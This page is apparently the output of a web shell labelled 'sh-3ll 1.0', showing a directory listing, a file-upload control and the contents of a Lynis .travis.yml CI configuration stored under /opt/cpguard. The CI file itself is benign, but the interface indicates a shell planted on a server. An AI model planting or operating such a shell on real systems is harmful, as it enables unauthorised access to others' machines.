HOME


sh-3ll 1.0
DIR:/opt/cpguard/3rdparty/lynis/
Upload File :
Current File : //opt/cpguard/3rdparty/lynis/.travis.yml
language: bash

before_script:
    - sh extras/travis-ci/before_script.sh

script:
    - cd .. && cd ./lynis-sdk && sh lynis-devkit run unit-tests

notifications:
  email:
    recipients:
      - lynis-dev@cisofy.com
    on_success: change
    on_failure: always